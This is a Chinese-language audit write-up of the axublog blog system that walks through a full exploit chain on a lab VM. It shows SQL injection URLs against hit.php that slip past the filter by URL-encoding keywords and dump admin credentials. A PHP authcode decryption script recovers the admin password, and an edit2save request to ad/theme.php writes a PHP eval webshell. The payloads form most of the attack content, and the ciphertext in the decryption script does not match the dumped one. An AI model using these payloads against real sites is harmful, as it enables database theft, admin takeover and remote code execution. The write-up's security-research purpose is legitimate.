对博客系统axublog代码审计到获取webshell
这是一个博客系统,在虚拟机安装好网站之后,如下所示:
1.从审计到sql注入
对源码进行审计,发现在hit.php文件中,$id和$g都是用户可控的,只要使参数g=arthit,参数id不为空,这里使用get方法接受id的值并带入sql执行语句,没有任何安全措施,更糟糕的是这里存在回显。
使用sql注入攻击,发现存在安全措施:
接着看源码,sqlguolv()函数非常可疑,代码开头使用了require()函数,在class/c_other.php发现了这个函数,这里使用了$_SERVER['QUERY_STRING']获取查询语句,一般是问号后面的字符串,然后使用preg_match()函数来匹配正则表达式。但是有一个问题:
使用$_SERVER['QUERY_STRING']不会对传入的字符进行URL解码操作,
而$_GET时候会进行一次URL解码。所以我们可以使用url编码的方式绕过检测。
u的编码是%75,s是%73。
(1)获取当前数据库
http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,database(),8,9,10,11,12
得到:axublog
(2)获取当前数据库所有表名
http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,group_concat(table_name),8,9,10,11,12%20from%20information_schema.tables%20where%20table_schema=%27axublog%27
得到:axublog_adusers,axublog_arts,axublog_nav_art,axublog_navs
(3)获取axublog_adusers表的字段名
http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,group_concat(column_name),8,9,10,11,12%20from%20information_schema.columns%20where%20table_schema=%27axublog%27%20and%20table_name=%27axublog_adusers%27
得到:id,adnaa,adpss,type
(4)获取axublog_adusers表的数据
http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,group_concat(concat_ws(char(32,58,32),id,adnaa,adpss,type)),8,9,10,11,12%20from%20axublog.axublog_adusers
账号:admin
密码:yYxvHseLMURYWjMU7Y79TDztVWMIdHcv7Xis9PZUnim8oVD0Ig
(5)从审计到解密
跟入authcode方法 在class\c_md5.php文件中的第19-62行中发现了该方法的代码块,把解密的方法取出来,从\ad\login.php的第88行可以知道加解密的字符串的固定的值key,使用如下代码解密:
<?php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 30) {
$ckey_length = 0;
// 随机密钥长度 取值 0-32;
// 加入随机密钥,可以令密文无任何规律,即便是原文和密钥完全相同,加密结果也会每次不同,增大破解难度。
// 取值越大,密文变动规律越大,密文变化 = 16 的 $ckey_length 次方
// 当此值为 0 时,则不产生随机密钥
$key = md5($key ? $key : EABAX::getAppInf('KEY'));
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
# sql注入获取的密文
$psw='yYxvHseLMURYWjJF7teoG23nUzJVc3wj4338oqgJxS4';
echo authcode(@$psw, 'DECODE', 'key',0)
?>
解密得到:
使用admin,admin123456登录后台:
2.从审计到任意文件上传
在ad/theme.php文件中,$g是通过get方法得到,用户可控,当$g=edit2save时就会调用edit2save()方法。在这个方法中,$path和$content分别表示路径和文件内容,用户可控,最后把这两个参数传入file_put_contents中进行保存操作。
经过上面的分析,我们可以构造如下链接,直接写入webshell:
http://192.168.223.134/axublog/ad/theme.php?g=edit2save&path=../shell.php&content=%3C?php%20@eval($_POST[cmd]);?%3E
成功拿到webshell如下:
这篇文章已经获得webshell,接下来将是提权与内网渗透,未完待续。。。